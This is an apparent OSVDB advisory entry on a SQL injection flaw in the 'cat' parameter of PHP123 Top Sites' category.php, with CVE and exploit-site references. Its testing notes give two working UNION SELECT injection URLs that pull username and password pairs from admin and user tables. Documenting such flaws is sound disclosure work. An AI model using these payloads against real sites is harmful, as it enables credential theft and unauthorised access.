PHP123 Top Sites category.php cat Variable SQL Injection

2007-07-28T00:00:00
ID OSVDB:37130
Type osvdb
Reporter OSVDB
Modified 2007-07-28T00:00:00

Description

Manual Testing Notes

http://[target]/category.php?cat=-1//UNION//ALL//SELECT//1,concat(username,0x3a,password),3,4,5//FROM//admin/ http://[target]/category.php?cat=-1//UNION//ALL//SELECT//1,concat(username,0x3a,password),3,4,5//FROM//users/

References:

ISS X-Force ID: 35679 Generic Exploit URL: http://www.milw0rm.com/exploits/4241 FrSIRT Advisory: ADV-2007-2693 CVE-2007-4054 Bugtraq ID: 25128